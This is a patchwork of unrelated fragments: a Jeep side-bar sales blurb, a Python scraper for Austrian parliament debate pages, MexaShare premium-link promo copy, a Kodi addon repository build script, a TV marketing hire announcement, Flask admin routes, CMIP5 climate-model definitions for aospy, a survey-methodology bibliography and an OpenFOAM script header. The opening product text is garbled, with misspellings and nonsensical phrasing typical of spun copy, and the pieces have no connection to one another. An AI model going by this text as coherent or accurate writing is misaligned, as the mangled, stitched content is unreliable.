Double Side Bars, Rubicon Silver™. Protect Your Party Panels With Heavy Wall Steel Tube. Trick Tube Desgn Protects Lowe rRocker Panel And The Side Of The Jeel��s Body. The Two Door Model Bolts On In Up Position For Maximhm Body Protection. The Four Door Model Can Be Reversed To Be Used As A Step For Easier Exig And Entrance Into Te Vehicle Or Reversed Viewed like Name Indicate And Used For Maximum Side Body Protection When Four Wheeling. Provides ¼ Of Steel Between Your Jeep And Anything You Come Up Against. Include Heavy Duty Stanchion Between Tubes In the place of Extra Sttength. Easily Bolts On, No Drilling Required.
|
import bs4 # BeautifulSoup HTML parser
import urllib2 # open URLs
import json # store data in a portable way
def parseData(htmlData, timeTable):
"""
The purpose of this function is to extract the interessting data from the
preloaded HTML page. This is done by using BeautifulSoup
"""
soup = bs4.BeautifulSoup(htmlData)
title = soup.find('title') # extract title and date information
title = title.text
start= title.find('am') # find begin of date string
if start != -1:
date = title[start+2:].strip().split()
else:
start= title.find('-')
date = title[start+2:].strip().split()
# extract all tables with a summary indictaing the people of the debate
table = soup.findAll('table', {'class': 'tabelle tabelleHistorie', \
'summary' : 'Rednerinnen und Redner der Debatte'})
for tab in table: # iterate over all tables extract the required information
topic = tab.find_previous_sibling("h3",{'style': 'padding-top: 0.5em;'}).text
fields = tab.findAll('td')
for i in range(len(fields)/9):
try:
#print fields[i*9+4].text.strip()
tmp = fields[i*9+6].text.strip().replace(':',' ').split()
if fields[i*9+2].text.strip() not in timeTable.keys():
timeTable[fields[i*9+2].text.strip()] = []
timeTable[fields[i*9+2].text.strip()].append([int(tmp[0])*60 + int(tmp[1]),topic,fields[i*9+4].text.strip()])
except:
continue
#print fields[i*9+2].text.strip(), fields[i*9+6].text.strip()
return date
def parseFullSet(s, timeTable):
"""
iterate over a full legislature period, this hast to be specified using
roman numbers.
"""
# allow up to 300 debate days, this is VERY unlikely to be exceeded
for i in range(300):
try:
page = 'http://www.parlament.gv.at/PAKT/VHG/{0}/NRSITZ/NRSITZ_{1:0>5}/index.shtml'.format(s,i)
print page
webpage = urllib2.urlopen(page)
table = {}
date = parseData(webpage,table)
print len(date), date
if len(date) != 3:
date = timeTable[-1][2:5]
print "neues d=", date
timeTable.append([s,i,date[0],date[1],date[2],table])
# in case the URL doesn't exist we ignore it
except urllib2.URLError:
continue
if __name__ == "__main__":
timeTable = []
parseFullSet('XX',timeTable)
parseFullSet('XXI',timeTable)
parseFullSet('XXII',timeTable)
parseFullSet('XXIII',timeTable)
parseFullSet('XXIV',timeTable)
parseFullSet('XXV',timeTable)
f = open("speakerTimeTable.json", "w")
json.dump(timeTable, f)
f.close()
#for i in timeTable:
# for j in i[5]:
# print i[0], i[1], i[2], i[3], i[4], j, i[5][j]
#print timeTable
|
MexaShare is online cloud filehost provider where you can upload, backup, store and share all your files with your friends and family or with whole web.
MexaShare Premium link generators uses MexaShare premium accounts to convert your MexaShare links to HTTP direct links.
MexaShare is online for all users! You can use it for free, but with MexaShare premium account you will get lot benefits!
|
import os
import shutil
toolsdir = os.path.dirname(os.path.abspath(__file__))
base_path = os.path.split(toolsdir)[0]
datadir = '_repo'
toolsdir = "_tools"
output = os.path.join(base_path, datadir)
#print 'Output directory is %s'% output
wslivetv = 'https://github.com/welwel2/wslivetv.git#dev'
#wslivetv = 'https://github.com/welwel2/wslivetv.git:plugin.video.wslivetv'
wslivestream = 'https://github.com/welwel2/wslivestream.git:plugin.video.wslivestream'
wsteledunet = 'https://github.com/welwel2/wsteledunet.git:plugin.video.wsteledunet'
wsrepo = 'https://github.com/welwel2/wsrepo.git:_repo/repository.wsrepo'
addons = [wslivetv, wslivestream, wsteledunet, wsrepo]
addons_str = ''.join('%s '%addon for addon in addons)
def update_remote(repo_path, rm='origin'):
# the objective here is to develp code to push the wsrepo changes to the server
# the steps requied are:
# 1. commit the changes locally
# 2. push changes to server
from git import Repo
repo = Repo(repo_path) # instantiate the repo
assert not repo.bare # ensure that the repo is not empty
if repo.is_dirty(): # check if there is changes that needs to be commited
# commit changes
# master = repo.heads.master
# repo.head.reference = master # switch to master branch
#git.checkout('--', '*.py[oc]')
index = repo.index
#for (path, stage), entry in index.entries.items():
# print path, stage
#repo.index.rm('*')
repo.index.add('*')
repo.index.add(repo.untracked_files)
repo.index.commit("commit changes")
print 'commited changes'
else:
print "repo is clean no changes to commit"
remote = eval('repo.remotes.%s'%rm)
assert remote.exists()
try:
remote.push()
except:
import push
pp = push.PushProject()
pp.get_git()
print 'pushed changes'
#print 'addons paths are %s'%addons_str
def delete_output():
if os.path.exists(output):
shutil.rmtree(output)
os.chdir(os.path.join(base_path, toolsdir))
if __name__ == "__main__":
delete_output()
os.system(r'py -3 create_repository.py --datadir=%s %s'%(output, addons_str))
update_remote(base_path)
|
Trading in cowboys boots for ski boots, Blair Nelson is making the move from Tegna’s WFAA in Dallas to Denver to head up marketing for KUSA. Prior to joining WFAA, she served in senior account management roles at several advertising agencies, leading campaigns for Chevrolet and MillerCoors.
KUSA, Denver’s NBC affiliate owned by Tegna, has named Blair Nelson as its director of marketing and brand.
Nelson, formerly at Tegna-owned ABC affiliate WFAA in Dallas where she oversaw the creative marketing department, is an Emmy-award winning brand manager.
In her role, Nelson will collaborate with the station’s leadership team on integrated marketing planning and strategy, fostering nontraditional partnerships in the Denver market, creating multiplatform campaigns to support the station’s brand and connecting the KUSA audience with its TV, digital and social content.
“Blair is an energetic leader and creative brand builder,” said Steve Carter, KUSA’s general manager.
Nelson is listed as brand manager for these two spots which won a Lone Star Emmy Award in 2017.
Prior to joining WFAA, she held senior account management roles at several advertising agencies, leading campaigns for Chevrolet and MillerCoors.
Nelson’s accolades include Edward R. Murrow Award-winning newscast contributor, ABC Social Media Advisory Board, Tegna’s Rising Star program, an Addy Award Gold for local television campaign and a Lone Star Chapter Emmy for best promotion campaign.
Nelson received her BA in public relations from Drake University, where she competed as an NCAA Division 1 student-athlete. She also earned a certificate of leadership from Southern Methodist University in Dallas.
|
from flask import render_template, request, redirect, url_for, g, jsonify, flash
from flask.ext.login import login_required
from app.models import Blog, Category
from app import avatars
from app.decorators import admin_required
from . import admin
@admin.route('/blogs/add/', methods=['GET', 'POST'])
@login_required
@admin_required
def add_blog():
from .forms import BlogForm
form = BlogForm()
g.open_article = True
if form.validate_on_submit():
try:
filename = avatars.save(request.files['avatars'])
except Exception as e:
flash('上传失败,请检查文件格式')
return render_template('admin/add_blog.html', form=form)
file_url = avatars.url(filename)
form.avatars.data = file_url
Blog.from_form(form)
return redirect(url_for('main.index'))
return render_template('admin/add_blog.html', form=form)
@admin.route('/blogs/edit/<int:id>/', methods=['GET', 'POST'])
@login_required
@admin_required
def edit_blog(id):
from .forms import EditBlogForm
blog = Blog.query.get_or_404(id)
form = EditBlogForm(title=blog.title,
category=blog.category_id,
summary=blog.summary,
blog_body=blog.body)
if form.validate_on_submit():
blog.title = form.title.data
blog.category_id = form.category.data
blog.summary = form.summary.data
blog.body = form.blog_body.data
blog.save()
return redirect(url_for('main.get_blog', id=id))
return render_template('admin/edit_blog.html', form=form)
@admin.route('/blogs/')
@login_required
@admin_required
def get_blogs():
g.open_article = True
return render_template('admin/blogs.html')
@admin.route('/api/categories/')
@login_required
@admin_required
def categories():
categories = Category.query.all()
data = [cate.to_dict() for cate in categories]
res = {'data': data}
return jsonify(res)
@admin.route('/api/blogs/')
@login_required
@admin_required
def blogs():
blogs = Blog.query.all()
data = [blog.to_dict() for blog in blogs]
res = {'data': data}
return jsonify(res)
|
'DSC_9283' (view full-sized 527.51KB) uploaded 2019-03-14 13:14 by lesnoybrodyaga. Like what you see? Add lesnoybrodyaga to your ❤ users!
|
"""aospy.Model objects corresponding to CMIP5 data."""
import datetime
import os
from aospy.model import Model
from .. import runs
root_dir = '/archive/pcmdi/repo/CMIP5/output/'
# BCC
bcc_csm1 = Model(
name='bcc_csm1-1',
description='',
# data_dir_struc='gfdl_repo',
# data_direc=os.path.realpath(os.path.join(root_dir, 'BCC/BCC-CSM1-1')),
grid_file_paths=[
'/archive/pcmdi/repo/CMIP5/output/BCC/BCC-CSM1-1/historical/fx/atmos/'
'fx/r0i0p0/v1/orog/orog_fx_bcc-csm1-1_historical_r0i0p0.nc',
'/archive/pcmdi/repo/CMIP5/output/BCC/BCC-CSM1-1/historical/fx/atmos/'
'fx/r0i0p0/v1/sftlf/sftlf_fx_bcc-csm1-1_historical_r0i0p0.nc',
'/archive/pcmdi/repo/CMIP5/output/BCC/BCC-CSM1-1/historical/fx/atmos/'
'fx/r0i0p0/v1/areacella/areacella_fx_bcc-csm1-1_historical_r0i0p0.nc',
],
# data_dur=30,
runs=[runs.amip, runs.amip4K],
default_runs=[runs.amip, runs.amip4K]
)
# BNU
bnu_esm = Model(
name='bnu_esm',
description='',
# data_dir_struc='gfdl_repo',
# data_direc=os.path.realpath(os.path.join(root_dir, 'BNU/BNU-ESM')),
runs=[runs.amip],
default_runs=False
)
# CCCma
cccma_canam4 = Model(
name='cccma_canam4',
description='',
# data_dir_struc='gfdl_repo',
# data_direc=os.path.realpath(os.path.join(root_dir, 'CCCma/CanAM4')),
repo_version=0,
# data_dur=30,
# data_start_date=datetime.datetime(1950, 1, 1),
# data_end_date=datetime.datetime(2009, 12, 31),
runs=[runs.amip, runs.amip4K],
default_runs=[runs.amip, runs.amip4K]
)
cccma_cancm4 = Model(
name='cccma_cancm4',
description='',
# data_dir_struc='gfdl_repo',
# data_direc=os.path.realpath(os.path.join(root_dir, 'CCCma/CanCM4')),
runs=[runs.amip],
default_runs=False
)
cccma_canesm2 = Model(
name='cccma_canesm2',
description='',
# data_dir_struc='gfdl_repo',
# data_direc=os.path.realpath(os.path.join(root_dir, 'CCCma/CanESM2')),
runs=[runs.amip],
default_runs=False
)
# CMCC
cmcc_cesm = Model(
name='cmcc-cesm',
description='',
# data_dir_struc='gfdl_repo',
# data_direc=os.path.realpath(os.path.join(root_dir, 'CMCC/CMCC-CESM')),
runs=[runs.amip],
default_runs=False
)
cmcc_cm = Model(
name='cmcc-cm',
description='',
# data_dir_struc='gfdl_repo',
# data_direc=os.path.realpath(os.path.join(root_dir, 'CMCC/CMCC-CM')),
runs=[runs.amip],
default_runs=False
)
cmcc_cms = Model(
name='cmcc-cms',
description='',
# data_dir_struc='gfdl_repo',
# data_direc=os.path.realpath(os.path.join(root_dir, 'CMCC/CMCC-CMS')),
runs=[runs.amip],
default_runs=False
)
# CNRM-CERFACS
cnrm_cm5 = Model(
name='cnrc-cm5',
description='',
# data_dir_struc='gfdl_repo',
# data_direc=os.path.realpath(os.path.join(root_dir, 'CNRM-CERFACS/CNRM-CM5')),
runs=[runs.amip, runs.amip4K],
default_runs=[runs.amip, runs.amip4K]
)
cnrm_cm5_2 = Model(
name='cnrc-cm5-2',
description='',
# data_dir_struc='gfdl_repo',
# data_direc=os.path.realpath(os.path.join(root_dir, 'CNRM-CERFACS/CNRC-CM5-2')),
runs=[runs.amip, runs.amip4K],
default_runs=[runs.amip, runs.amip4K]
)
# COLA-CFS
cola_cfsv2 = Model(
name='cola-cfsv2-2011',
description='',
# data_dir_struc='gfdl_repo',
# data_direc=os.path.realpath(os.path.join(root_dir, 'COLA/CFSv2-2011')),
runs=[runs.amip, runs.amip4K],
default_runs=[runs.amip, runs.amip4K]
)
# CSIRO-BOM
csiro_bom_access1_0 = Model(
name='csiro-bom-access1-0',
description='',
# data_dir_struc='gfdl_repo',
# data_direc=os.path.realpath(os.path.join(root_dir, 'CSIRO-BOM/CSIRO-ACCESS1-0')),
runs=[runs.amip, runs.amip4K],
default_runs=[runs.amip, runs.amip4K]
)
csiro_bom_access1_3 = Model(
name='csiro-bom-access1-3',
description='',
# data_dir_struc='gfdl_repo',
# data_direc=os.path.realpath(os.path.join(root_dir, 'CSIRO-BOM/CSIRO-ACCESS1-3')),
runs=[runs.amip, runs.amip4K],
default_runs=[runs.amip, runs.amip4K]
)
# CSIRO-QCCCE
csiro_qccce_mk3_6_0 = Model(
name='csiro-qccce-mk3-6-0',
description='',
# data_dir_struc='gfdl_repo',
# data_direc=os.path.realpath(os.path.join(root_dir, 'CSIRO-QCCCE/CSIRO-Mk3-6-0')),
runs=[runs.amip, runs.amip4K],
default_runs=[runs.amip, runs.amip4K]
)
# FIO
fio_esm = Model(
name='fio-esm',
description='',
# data_dir_struc='gfdl_repo',
# data_direc=os.path.realpath(os.path.join(root_dir, 'FIO/FIO-ESM')),
runs=[runs.amip, runs.amip4K],
default_runs=[runs.amip, runs.amip4K]
)
# ICHEC
ichec_ec_earth = Model(
name='ichec_ec_earth',
description='',
# data_dir_struc='gfdl_repo',
# data_direc=os.path.realpath(os.path.join(root_dir, 'ICHEC/EC-EARTH')),
repo_ens_mem='r3i1p1',
runs=[runs.amip, runs.amip4K],
default_runs=[runs.amip, runs.amip4K]
)
# INM
inm_cm4 = Model(
name='inm-cm4',
description='',
# data_dir_struc='gfdl_repo',
# data_direc=os.path.realpath(os.path.join(root_dir, 'INM/INM-CM4')),
runs=[runs.amip, runs.amip4K],
default_runs=[runs.amip, runs.amip4K]
)
# INPE
inpe_hadgem2_es = Model(
name='inpe-hadgem2-es',
description='',
# data_dir_struc='gfdl_repo',
# data_direc=os.path.realpath(os.path.join(root_dir, 'INPE/HadGEM2-ES')),
runs=[runs.amip, runs.amip4K],
default_runs=[runs.amip, runs.amip4K]
)
# IPSL
ipsl_cm5a_lr = Model(
name='ipsl-cm5a-lr',
description='',
# data_dir_struc='gfdl_repo',
# data_direc=os.path.realpath(os.path.join(root_dir, 'IPSL/IPSL-CM5A-LR')),
runs=[runs.amip, runs.amip4K],
default_runs=[runs.amip, runs.amip4K]
)
ipsl_cm5a_mr = Model(
name='ipsl-cm5a-mr',
description='',
# data_dir_struc='gfdl_repo',
# data_direc=os.path.realpath(os.path.join(root_dir, 'IPSL/IPSL-CM5A-MR')),
runs=[runs.amip, runs.amip4K],
default_runs=[runs.amip, runs.amip4K]
)
ipsl_cm5b_lr = Model(
name='ipsl-cm5b-lr',
description='',
# data_dir_struc='gfdl_repo',
# data_direc=os.path.realpath(os.path.join(root_dir, 'IPSL/IPSL-CM5B-LR')),
grid_file_paths=[
'/archive/pcmdi/repo/CMIP5/output/IPSL/IPSL-CM5B-LR/piControl/fx/'
'atmos/fx/r0i0p0/v20120430/orog/'
'orog_fx_IPSL-CM5B-LR_piControl_r0i0p0.nc',
'/archive/pcmdi/repo/CMIP5/output/IPSL/IPSL-CM5B-LR/piControl/fx/'
'atmos/fx/r0i0p0/v20120430/areacella/'
'areacella_fx_IPSL-CM5B-LR_piControl_r0i0p0.nc',
'/archive/pcmdi/repo/CMIP5/output/IPSL/IPSL-CM5B-LR/piControl/fx/'
'atmos/fx/r0i0p0/v20120430/sftlf/'
'sftlf_fx_IPSL-CM5B-LR_piControl_r0i0p0.nc',
],
runs=[runs.amip, runs.amip4K],
default_runs=[runs.amip, runs.amip4K]
)
# LASG-CESS
lasg_cess_fgoals_g2 = Model(
name='lasg-cess-fgoals-g2',
description='',
# data_dir_struc='gfdl_repo',
# data_direc=os.path.realpath(os.path.join(root_dir, 'LASG-CESS/FGOALS-g2')),
repo_version=0,
runs=[runs.amip, runs.amip4K],
default_runs=[runs.amip, runs.amip4K]
)
# LASG-IAP
lasg_iap_fgoals_g1 = Model(
name='lasg-iap-fgoals-g1',
description='',
# data_dir_struc='gfdl_repo',
# data_direc=os.path.realpath(os.path.join(root_dir, 'LASG-IAP/FGOALS-g1')),
runs=[runs.amip, runs.amip4K],
default_runs=[runs.amip, runs.amip4K]
)
lasg_iap_fgoals_s2 = Model(
name='lasg-iap-fgoals-s2',
description='',
# data_dir_struc='gfdl_repo',
# data_direc=os.path.realpath(os.path.join(root_dir, 'LASG-IAP/FGOALS-s2')),
runs=[runs.amip, runs.amip4K],
default_runs=[runs.amip, runs.amip4K]
)
# MIROC
miroc4h = Model(
name='miroc4h',
description='',
# data_dir_struc='gfdl_repo',
# data_direc=os.path.realpath(os.path.join(root_dir, 'MIROC/MIROC4h')),
runs=[runs.amip, runs.amip4K],
default_runs=[runs.amip, runs.amip4K]
)
miroc5 = Model(
name='miroc5',
description='',
# data_dir_struc='gfdl_repo',
# data_direc=os.path.realpath(os.path.join(root_dir, 'MIROC/MIROC5')),
runs=[runs.amip, runs.amip4K],
default_runs=[runs.amip, runs.amip4K]
)
miroc_esm = Model(
name='miroc-esm',
description='',
# data_dir_struc='gfdl_repo',
# data_direc=os.path.realpath(os.path.join(root_dir, 'MIROC/MIROC-ESM')),
runs=[runs.amip, runs.amip4K],
default_runs=[runs.amip, runs.amip4K]
)
miroc_esm_chem = Model(
name='miroc-esm-chem',
description='',
# data_dir_struc='gfdl_repo',
# data_direc=os.path.realpath(os.path.join(root_dir, 'MIROC/MIROC-ESM-CHEM')),
runs=[runs.amip, runs.amip4K],
default_runs=[runs.amip, runs.amip4K]
)
# MOHC (Met Office Hadley Centre)
mohc_hadcm3 = Model(
name='mohc_hadcm3',
description='',
# data_dir_struc='gfdl_repo',
# data_direc=os.path.realpath(os.path.join(root_dir, 'MOHC/HadCM3')),
runs=[runs.amip, runs.amip4K],
default_runs=[runs.amip, runs.amip4K]
)
mohc_hadgem2_a = Model(
name='mohc_hadgem2a',
description='',
# data_dir_struc='gfdl_repo',
repo_version=1,
# data_direc=os.path.realpath(os.path.join(root_dir, 'MOHC/HadGEM2-A')),
runs=[runs.amip, runs.amip4K],
default_runs=[runs.amip, runs.amip4K]
)
mohc_hadgem2_cc = Model(
name='mohc_hadgem2cc',
description='',
# data_dir_struc='gfdl_repo',
# data_direc=os.path.realpath(os.path.join(root_dir, 'MOHC/HadGEM2-CC')),
runs=[runs.amip, runs.amip4K],
default_runs=[runs.amip, runs.amip4K]
)
mohc_hadgem2_es = Model(
name='hadgem2-es',
description='',
# data_dir_struc='gfdl_repo',
# data_direc=os.path.realpath(os.path.join(root_dir, 'MOHC/HadGEM2-ES')),
runs=[runs.amip, runs.amip4K],
default_runs=[runs.amip, runs.amip4K]
)
# MPI-M
mpi_m_esm_lr = Model(
name='mpi-esm-lr',
description='',
# data_dir_struc='gfdl_repo',
# data_direc=os.path.realpath(os.path.join(root_dir, 'MPI-M/MPI-ESM-LR')),
runs=[runs.amip, runs.amip4K],
default_runs=[runs.amip, runs.amip4K]
)
mpi_m_esm_mr = Model(
name='mpi-esm-mr',
description='',
# data_dir_struc='gfdl_repo',
# data_direc=os.path.realpath(os.path.join(root_dir, 'MPI-M/MPI-ESM-MR')),
runs=[runs.amip, runs.amip4K],
default_runs=[runs.amip, runs.amip4K]
)
mpi_m_esm_p = Model(
name='mpi-esm-p',
description='',
# data_dir_struc='gfdl_repo',
# data_direc=os.path.realpath(os.path.join(root_dir, 'MPI-M/MPI-ESM-P')),
runs=[runs.amip, runs.amip4K],
default_runs=[runs.amip, runs.amip4K]
)
# MRI
mri_agcm3_2h = Model(
name='mri-agcm3-2h',
description='',
# data_dir_struc='gfdl_repo',
# data_direc=os.path.realpath(os.path.join(root_dir, 'MRI/MRI-AGCM3-2H')),
runs=[runs.amip, runs.amip4K],
default_runs=[runs.amip, runs.amip4K]
)
mri_agcm3_2s = Model(
name='mri-agcm3-2s',
description='',
# data_dir_struc='gfdl_repo',
# data_direc=os.path.realpath(os.path.join(root_dir, 'MRI/MRI-AGCM3-2S')),
runs=[runs.amip, runs.amip4K],
default_runs=[runs.amip, runs.amip4K]
)
mri_cgcm3 = Model(
name='mri-cgcm3',
description='',
# data_dir_struc='gfdl_repo',
# data_direc=os.path.realpath(os.path.join(root_dir, 'MRI/MRI-CGCM3')),
runs=[runs.amip, runs.amip4K],
default_runs=[runs.amip, runs.amip4K]
)
mri_esm1 = Model(
name='mri-esm1',
description='',
# data_dir_struc='gfdl_repo',
# data_direc=os.path.realpath(os.path.join(root_dir, 'MRI/MRI-ESM1')),
runs=[runs.amip, runs.amip4K],
default_runs=[runs.amip, runs.amip4K]
)
# NASA-GISS
nasa_giss_e2_h = Model(
name='giss-e2-h',
description='',
# data_dir_struc='gfdl_repo',
# data_direc=os.path.realpath(os.path.join(root_dir, 'NASA-GISS/GISS-E2-H')),
runs=[runs.amip, runs.amip4K],
default_runs=[runs.amip, runs.amip4K]
)
nasa_giss_e2_h_cc = Model(
name='giss-e2-h-cc',
description='',
# data_dir_struc='gfdl_repo',
# data_direc=os.path.realpath(os.path.join(root_dir, 'NASA-GISS/GISS-E2-H-CC')),
runs=[runs.amip, runs.amip4K],
default_runs=[runs.amip, runs.amip4K]
)
nasa_giss_e2_r = Model(
name='giss-e2-r',
description='',
# data_dir_struc='gfdl_repo',
# data_direc=os.path.realpath(os.path.join(root_dir, 'NASA-GISS/GISS-E2-R')),
runs=[runs.amip, runs.amip4K],
default_runs=[runs.amip, runs.amip4K]
)
nasa_giss_e2_r_cc = Model(
name='giss-e2-r-cc',
description='',
# data_dir_struc='gfdl_repo',
# data_direc=os.path.realpath(os.path.join(root_dir, 'NASA-GISS/GISS-E2-R-CC')),
runs=[runs.amip, runs.amip4K],
default_runs=[runs.amip, runs.amip4K]
)
# NASA-GMAO
nasa_gmao_geos_5 = Model(
name='gmao-geos-5',
description='',
# data_dir_struc='gfdl_repo',
# data_direc=os.path.realpath(os.path.join(root_dir, 'NASA-GMAO/GEOS-5')),
runs=[runs.amip, runs.amip4K],
default_runs=[runs.amip, runs.amip4K]
)
# NCAR
ncar_ccsm4 = Model(
name='ncar-ccsm4',
description='',
# data_dir_struc='gfdl_repo',
# data_direc=os.path.realpath(os.path.join(root_dir, 'NCAR/CCSM4')),
grid_file_paths=[
'/archive/pcmdi/repo/CMIP5/output/NCAR/CCSM4/piControl/fx/atmos/fx/'
'r0i0p0/v20120413/orog/orog_fx_CCSM4_piControl_r0i0p0.nc',
'/archive/pcmdi/repo/CMIP5/output/NCAR/CCSM4/piControl/fx/atmos/fx/'
'r0i0p0/v20120413/sftlf/sftlf_fx_CCSM4_piControl_r0i0p0.nc',
'/archive/pcmdi/repo/CMIP5/output/NCAR/CCSM4/piControl/fx/atmos/fx/'
'r0i0p0/v20120213/areacella/areacella_fx_CCSM4_piControl_r0i0p0.nc',
],
runs=[runs.amip, runs.amip4K],
default_runs=[runs.amip, runs.amip4K]
)
# NCC
ncc_noresm1_m = Model(
name='ncc-noresm1-m',
description='',
# data_dir_struc='gfdl_repo',
# data_direc=os.path.realpath(os.path.join(root_dir, 'NCC/NorESM1-M')),
runs=[runs.amip, runs.amip4K],
default_runs=[runs.amip, runs.amip4K]
)
ncc_noresm1_me = Model(
name='ncc-noresm1-me',
description='',
# data_dir_struc='gfdl_repo',
# data_direc=os.path.realpath(os.path.join(root_dir, 'NCC/NorESM1-me')),
runs=[runs.amip, runs.amip4K],
default_runs=[runs.amip, runs.amip4K]
)
# NCEP
ncep_cfsv2_2011 = Model(
name='ncep_cfsv2-2011',
description='',
# data_dir_struc='gfdl_repo',
# data_direc=os.path.realpath(os.path.join(root_dir, 'NCEP/CFSv2-2011')),
runs=[runs.amip, runs.amip4K],
default_runs=[runs.amip, runs.amip4K]
)
# NIMR-KMA
nimr_kma_hadgem2_ao = Model(
name='nimr-kma-hadgem2-ao',
description='',
# data_dir_struc='gfdl_repo',
# data_direc=os.path.realpath(os.path.join(root_dir, 'NIMR-KMA/HadGEM2-AO')),
runs=[runs.amip, runs.amip4K],
default_runs=[runs.amip, runs.amip4K]
)
# NOAA-GFDL
gfdl_cm2_1 = Model(
name='gfdl_cm2.1',
description='NOAA GFDL CM2.1 AOGCM',
# data_dir_struc='gfdl_repo',
# data_direc=os.path.realpath(os.path.join(root_dir, 'NOAA-GFDL/GFDL-CM2')),
runs=[runs.amip, runs.amip4K],
default_runs=[runs.amip, runs.amip4K]
)
gfdl_cm3 = Model(
name='gfdl_cm3',
description='NOAA GFDL CM3 AOGCM',
# data_dir_struc='gfdl_repo',
# data_direc=os.path.realpath(os.path.join(root_dir, 'NOAA-GFDL/GFDL-CM3')),
runs=[runs.amip, runs.amip4K],
default_runs=[runs.amip, runs.amip4K]
)
gfdl_esm2m = Model(
name='gfdl_esm2m',
description='NOAA GFDL ESM2M earth-system model',
# data_dir_struc='gfdl_repo',
# data_direc=os.path.realpath(os.path.join(root_dir, 'NOAA-GFDL/GFDL-ESM2M')),
runs=[runs.amip, runs.amip4K],
default_runs=[runs.amip, runs.amip4K]
)
gfdl_esm2g = Model(
name='gfdl_esm2g',
description='NOAA GFDL ESM2G earth-system model',
# data_dir_struc='gfdl_repo',
# data_direc=os.path.realpath(os.path.join(root_dir, 'NOAA-GFDL/GFDL-ESM2G')),
runs=[runs.amip, runs.amip4K],
default_runs=[runs.amip, runs.amip4K]
)
gfdl_hiram_c180 = Model(
name='gfdl_hiram-c180',
description='NOAA GFDL HIRAM-C180 AGCM',
# data_dir_struc='gfdl_repo',
# data_direc=os.path.realpath(os.path.join(root_dir, 'NOAA-GFDL/GFDL-HIRAM-C180')),
runs=[runs.amip, runs.amip4K],
default_runs=[runs.amip, runs.amip4K]
)
gfdl_hiram_c360 = Model(
name='gfdl_hiram-c360',
description='NOAA GFDL HIRAM-C360 AGCM',
# data_dir_struc='gfdl_repo',
# data_direc=os.path.realpath(os.path.join(root_dir, 'NOAA-GFDL/GFDL-HIRAM-C360')),
runs=[runs.amip, runs.amip4K],
default_runs=[runs.amip, runs.amip4K]
)
# NSF-DOE-NCAR
cesm1_bgc = Model(
name='cesm1-bgc',
description='',
# data_dir_struc='gfdl_repo',
# data_direc=os.path.realpath(os.path.join(root_dir, 'NSF-DOE-NCAR/CESM1-BGC')),
runs=[runs.amip, runs.amip4K],
default_runs=[runs.amip, runs.amip4K]
)
cesm1_cam5 = Model(
name='ncar_cesm1_cam5',
description='',
# data_dir_struc='gfdl_repo',
# data_direc=os.path.realpath(os.path.join(root_dir, 'NSF-DOE-NCAR/CESM1-CAM5')),
grid_file_paths=['/archive/s1h/cmip5/cam5_land_mask/cam5_land_mask.nc'],
runs=[runs.amip, runs.amip4K],
default_runs=[runs.amip, runs.amip4K]
)
cesm1_cam5_1_fv2 = Model(
name='cesm1-cam5-1-fv2',
description='',
# data_dir_struc='gfdl_repo',
# data_direc=os.path.realpath(os.path.join(root_dir, 'NSF-DOE-NCAR/CESM1-CAM5-1-FV2')),
runs=[runs.amip, runs.amip4K],
default_runs=[runs.amip, runs.amip4K]
)
cesm1_fastchem = Model(
name='cesm1-fastchem',
description='',
# data_dir_struc='gfdl_repo',
# data_direc=os.path.realpath(os.path.join(root_dir, 'NSF-DOE-NCAR/CESM1-FASTCHEM')),
runs=[runs.amip, runs.amip4K],
default_runs=[runs.amip, runs.amip4K]
)
cesm1_waccm = Model(
name='cesm1-waccm',
description='',
# data_dir_struc='gfdl_repo',
# data_direc=os.path.realpath(os.path.join(root_dir, 'NSF-DOE-NCAR/CESM1-WACCM')),
runs=[runs.amip, runs.amip4K],
default_runs=[runs.amip, runs.amip4K]
)
# SMHI
smhi_ec_earth = Model(
name='smhi_ec_earth',
description='',
# data_dir_struc='gfdl_repo',
# data_direc=os.path.realpath(os.path.join(root_dir, 'SMHI/EC-EARTH')),
runs=[runs.amip, runs.amip4K],
default_runs=[runs.amip, runs.amip4K]
)
# UNSW
unsw_csiro_mk3l_1_2 = Model(
name='unsw-csiro-mk3l-1-2',
description='',
# data_dir_struc='gfdl_repo',
# data_direc=os.path.realpath(os.path.join(root_dir, 'UNSW/CSIRO-Mk3L-1-2')),
runs=[runs.amip, runs.amip4K],
default_runs=[runs.amip, runs.amip4K]
)
|
Survey methodology, accuracy of the collecting information, survey questionnaire design, psychology of survey response, methodology of the sensitive topics, the impact of data collection.
Groves R.M., Fowler F.J., Couper M.P., Lepkowski J.M., Singer E., Tourangeau R. Survey Methodology. N.Y.: Wiley. 2004.
Tourangeau R., Rips L.J., Rasinski K. The Psychology of Survey Response. Cambridge: Cambridge University Press. 2002.
Cognition and Survey Research / M.G. Sirken, D.J. Herrmann, S. Schechter, N. Schwarz, J. Tanur, R. Tourangeau. New York: Wiley. 1999.
Jabine T., Straf M., Tanur J., Tourangeau R. Cognitive Aspects of Survey Design: Building a Bridge Between Disciplines. Washington: National Academy Press. 1984.
Tourangeau R. Survey questionnaire design // Encyclopedia of Statistics in Behavioral Science / Ed. by B. Everitt, D. Howell. Vol. 4. West Sussex: John Wiley, 2005.
Lee S., Mathiowetz N.A., Tourangeau R. Perceptions of Disability: The Effects of Self- and Proxy Response // Journal of Official Statistics. 2004. Vol. 20. 671-686.
Couper M.P., Singer E., Tourangeau R. Understanding the effects of audio-CASI on selfreports of sensitive behavior // Public Opinion Quarterly. Vol. 67. 385-395.
Tourangeau R., Singer E., Presser S. Context effects in attitude surveys: Effects on remote items and impact on predictive validity // Sociological Methods and Research. 2003. Vol. 31. 486-513.
Tourangeau R. Cognitive aspects of survey measurement and mismeasurement // International Journal of Public Opinion Research. 2003. Vol. 15. P. 3-7.
Tourangeau R., Smith T.W., Rasinski K. Motivation to report sensitive behaviors in surveys: Evidence from a bogus pipeline experiment // Journal of Applied Social Psychology. 1997. Vol. 27. P. 209-222.
Tourangeau R., Smith, T. Asking sensitive questions: The impact of data collection, question format, and question context // Public Opinion Quarterly 1996. Vol. 60. P. 275-304.
Tourangeau R., Rasinski K. Cognitive processes underlying context effects in attitude measurement // Psychological Bulletin. 1988. Vol. 103. P. 299-314.
Журнал социологии и социальной антропологии. 2006. Т. 9. № 1. С. 195-202.
Социологический журнал. 1994. № 3. С. 157-185.
Социологические исследования. 2008. № 5. С. 26-36.
|
#------------------------------------------------------------------------------------------------------------
#
# This program averages openfoam probe data azimuthally. If variable is a scalar it also outputs the std-dev
#
# Output format : velocity : r z ux uy uz ur ut uz
# scalar : r z scalar
#
# Usage : python UProbefile
#
# Author : Bruno Blais
#
#-------------------------------------------------------------------------------------------------------------
